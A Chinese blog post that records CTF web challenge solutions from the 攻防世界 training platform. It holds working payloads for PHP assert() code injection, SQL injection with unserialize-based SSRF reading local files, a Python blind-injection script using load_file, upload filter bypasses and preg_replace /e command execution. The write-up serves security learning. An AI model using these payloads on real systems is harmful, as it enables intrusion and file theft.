您的位置: 首页  >  IT文章  >  刷 攻防世界 记录 (持续更新)

刷 攻防世界 记录 (持续更新)

分类: IT文章 2022-02-15 11:58:51

刷 攻防世界 记录 (持续更新)

 

  • Web 2 

按照他的逻辑反过来就行了

<?php
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";
$_o=base64_decode(strrev(str_rot13($miwen)));
for($_0=0;$_0<strlen($_o);$_0++){
       
        $_c=substr($_o,$_0,1);
        $__=ord($_c)-1;
        $_c=chr($__);
        $_=$_.$_c;   
    }
echo strrev($_);

?>

 

 

  • Lottery    

1).git泄露

2)Php弱类型 ‘==’ bool类型得ture与任何东西都相等

 

刷 攻防世界 记录 (持续更新)

 

 

 

Payload  

{“action”:”buy”,“number”:{”0”:true, ”1”:true, ”2”:true, ”3”:true, ”4”:true, ”5”:true, ”6”:true}}

或者

{“action”:”buy”,“number”:{true, true, true, true, true, true, true}}

 

 

 

  • Mfw

1).git泄露

2)危险函数:assert()

Assert(assertion,参数2)

判断一个断言是否为FALSE,注意当assertion为字符串时,会将assertion当作代码执行。

返回值:assertion 是 false 则返回 FALSE,否则是 TRUE。

源码:

 

<?php

if (isset($_GET['page'])) {
    $page = $_GET['page'];
} else {
    $page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

?>

这里下来测试了一下,发现当里面命令是两个得时候,它只会执行第一个命令

刷 攻防世界 记录 (持续更新)

 

所以这里无法在字符串里面做手脚

自己本地测试下

刷 攻防世界 记录 (持续更新)

 

 Payload是  abc’,’.’) or phpinfo();\ 这里我不能理解为什么没有双引号,后来才知道是理解失误,这里最终还是在双引号里面去做手脚,因为无法去破坏这个语句,在双引号里使用命令同样可以使用 or 命令,或者and 命令,之前一直以为or 和and 只能在括号里使用,其实不然,一直都可以使用

刷 攻防世界 记录 (持续更新)

 

 刷 攻防世界 记录 (持续更新)

 

 

当然and逻辑也是可以的,符号代替也是可以的。

所以这里我们传入的 a’) or phpinfo();//是去闭合 strpos() 而且注释仅仅是注释掉 ===false

然后这里的整个字符串都会被拿去执行,带出答案。

另一种payload是    ‘.phpinfo().’

这个payload是绕过第二个语句

刷 攻防世界 记录 (持续更新)

 

本地测试:

 刷 攻防世界 记录 (持续更新)

 

两个单引号前后闭合,然后逃逸处语句 phpinfo();

 

最终这道题的payload是

?page= abc’,’.’) or system(“cat templates/flag.php”);\

或者

?page=’. system(“cat templates/flag.php”);.’

另外 利用file_get_contents也是可以的

总结:

1)  Assert(assertion,参数2)   ☆   判断一个断言是否为FALSE,注意当assertion为字符串时,会将assertion当作代码执行。

2) and(&&) or(||) 不一定在括号里使用,直接使用也可 

  • fakebook

1) 源码泄露

2) SQL注入

3) Ssrf

4) 反序历化

 

看着别人的wp做的,就想问我的御剑没扫出来robots.txt?

做的时候首先是以为简单的sql注入,没想到什么也没有,users表里面有四列 username,password,age,data找了找里面并么有flag。后来上网翻才知道有源码泄露。

 

 

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))://)?)([0-9a-zA-Z-]+.)+[a-zA-Z]{2,6}(:[0-9]+)?(/S*)?$/i", $blog);
    }

}

 

泄露的 user.php.bak

可以看到get()方法是存在ssrf漏洞的,但是isValidBlog() 是过滤了的,但是这道题最终的payload:

http://111.198.29.45:34985/view.php?no=0/**/union/**/select%201,2,3,'O:8:%22UserInfo%22:3:{s:4:%22name%22;s:7:%22dimpl3s%22;s:3:%22age%22;i:1;s:4:%22blog%22;s:29:%22file:///var/www/html/user.php%22;}'--

开始一直没搞懂为什么在第四列传入序列化能引起漏洞,后来用这个payload去读一读 view.php的源码

<?php
<?php session_start(); ?>
<?php require_once 'db.php'; ?>
<?php require_once 'user.php'; ?>
<?php require_once 'error.php'; ?>
<?php

$db = new DB();

?>
<?php

$no = $_GET['no'];
if ($db->anti_sqli($no))
{
    die("no hack ~_~");
}

$res = $db->getUserByNo($no);
$user = unserialize($res['data']); //漏洞点
//print_r($res);

?>
<?php

    $response = $user->getBlogContents();
    if ($response === 404)
    {
        echo "404 Not found";
    }

    else
    {
        $base64 = base64_encode($response);
        echo "<iframe width='100%' height='10em' src='data:text/html;base64,{$base64}'>";
        // echo $response;
    }

    // var_dump($user->getBlogContents());
?>

看来源码才知道,这里直接去反序列化$res['data'],也就是我们传入的blog,而且并没有经过过滤

$user = unserialize($res['data']);

另外,payLoad一定是在第四列,因为后台 data也在第四列

 

但是这里正向来做这道题的思路这样的

刷 攻防世界 记录 (持续更新)

 

而且这里看到unserialize()想到反序列化时就应该结合反序列化漏洞配合,而且传入1,2,3,4报错应该联想到这其中某个值会被反序历化。唉,我太菜了。

另一种非预期解题:

这道题没有过滤 load_file() 记住这个点,以后万一可以用了,测试了以下攻击的点,我利用的是异或注入

刷 攻防世界 记录 (持续更新)

接下来就可以写脚本跑了

import requests

flag=''
str1='tanglibo'
for i in range(1,5):
    for j in range(33,126):
        #url="http://111.198.29.45:34985/view.php?no=0^(ascii(substr(database(),"+str(i)+",1))="+str(j)+")"
        url = "http://111.198.29.45:34985/view.php?no=0^(ascii(substr((load_file('/var/www/html/flag.php'))," + str(i) + ",1))=" + str(j) + ")"
        s=requests.get(url)
        if str1 in s.text:
            flag=flag+chr(j)
            print(flag+ " is")
            break
        else:
            print(chr(j)+" is not")

学到的东西:

1)load_file('filename')

2) curl 知识 

https://www.cnblogs.com/lxj0205/p/9360826.html

  • bug

重置密码处存在重置任意用户密码

刷 攻防世界 记录 (持续更新)

 进去后发现上传页面,有简单的过滤

后缀名绕过 php5

短标签绕过 <script language="php">phpinfo();</script>

刷 攻防世界 记录 (持续更新)

  • ics-05  

1)文件包含

2)preg_replace()  /e    下的命令执行

拿到index.php的源码过后就会发现 preg_replace 三个参数均可控。

刷 攻防世界 记录 (持续更新)

注意: 在 cd 目录的时候 ,连接命令 ‘&& ’符号要用url编码格式,不然命令执行不成功,估计可能是因为 url中‘&’符号本身含有传递参数的意义

相关推荐